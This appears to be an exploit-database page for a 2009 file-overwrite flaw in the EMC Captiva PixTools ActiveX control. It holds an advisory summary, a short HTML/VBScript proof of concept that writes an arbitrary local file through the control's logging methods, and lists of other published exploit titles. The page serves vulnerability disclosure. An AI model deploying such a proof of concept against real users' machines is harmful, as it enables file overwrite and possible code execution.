Menu

Search for hundreds of thousands of exploits

"EMC Captiva PixTools 2.2 Distributed Imaging - ActiveX Control Multiple Insecure Method Vulnerabilities"

Author

Exploit author

"Giuseppe Fuggiano"

Platform

Exploit platform

windows

Release date

Exploit published date

2009-10-01

Download file

1
2
3
4
5
6
7
8
9
source: https://www.securityfocus.com/bid/36566/info

The EMC Captiva PixTools Distributed Imaging ActiveX control is prone to multiple insecure-method vulnerabilities that affect the PDIControl.PDI.1 ActiveX control (PDIControl.dll).

Successfully exploiting these issues allows remote attackers to create or overwrite arbitrary local files, which may lead to arbitrary code execution.

PDIControl.dll 2.2.3160.0 is vulnerable; other versions may also be affected. 

<object classid='clsid:00200338-3D33-4FFC-AC20-67AA234325F3' id='test'></object> <input language=VBScript onclick=tryMe() type=button value='Click here to start the test'> <script language='vbscript'> Sub tryMe test.SetLogLevel 1 test.SetLogFileName "c:\some.txt" test.WriteToLog 1, "Hello World!" End Sub </script>
Release Date Title Type Platform Author
2020-12-02 "Microsoft Windows - Win32k Elevation of Privilege" local windows nu11secur1ty
2020-12-02 "Bakeshop Online Ordering System 1.0 - 'Owner' Persistent Cross-site scripting" webapps multiple "Parshwa Bhavsar"
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "ILIAS Learning Management System 4.3 - SSRF" webapps multiple Dot
Release Date Title Type Platform Author
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
2020-12-02 "PRTG Network Monitor 20.4.63.1412 - 'maps' Stored XSS" webapps windows "Amin Rawah"
2020-12-02 "Microsoft Windows - Win32k Elevation of Privilege" local windows nu11secur1ty
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-01 "Global Registration Service 1.0.0.3 - 'GREGsvc.exe' Unquoted Service Path" local windows "Emmanuel Lujan"
2020-12-01 "Intel(r) Management and Security Application 5.2 - User Notification Service Unquoted Service Path" local windows "Metin Yunus Kandemir"
2020-12-01 "EPSON Status Monitor 3 'EPSON_PM_RPCV4_06' - Unquoted Service Path" local windows SamAlucard
2020-12-01 "Pearson Vue VTS 2.3.1911 Installer - VUEApplicationWrapper Unquoted Service Path" local windows Jok3r
2020-12-01 "10-Strike Network Inventory Explorer 8.65 - Buffer Overflow (SEH)" local windows Sectechs
2020-11-30 "YATinyWinFTP - Denial of Service (PoC)" remote windows strider
Release Date Title Type Platform Author
2020-11-24 "ZeroShell 3.9.0 - 'cgi-bin/kerbynet' Remote Root Command Injection (Metasploit)" webapps linux "Giuseppe Fuggiano"
2009-10-01 "EMC Captiva PixTools 2.2 Distributed Imaging - ActiveX Control Multiple Insecure Method Vulnerabilities" remote windows "Giuseppe Fuggiano"
2009-09-29 "Flatpress 0.804 < 0.812.1 - Local File Inclusion" webapps php "Giuseppe Fuggiano" 
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Cipher Protocols Sigalg Trusted

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.

Host WAF detected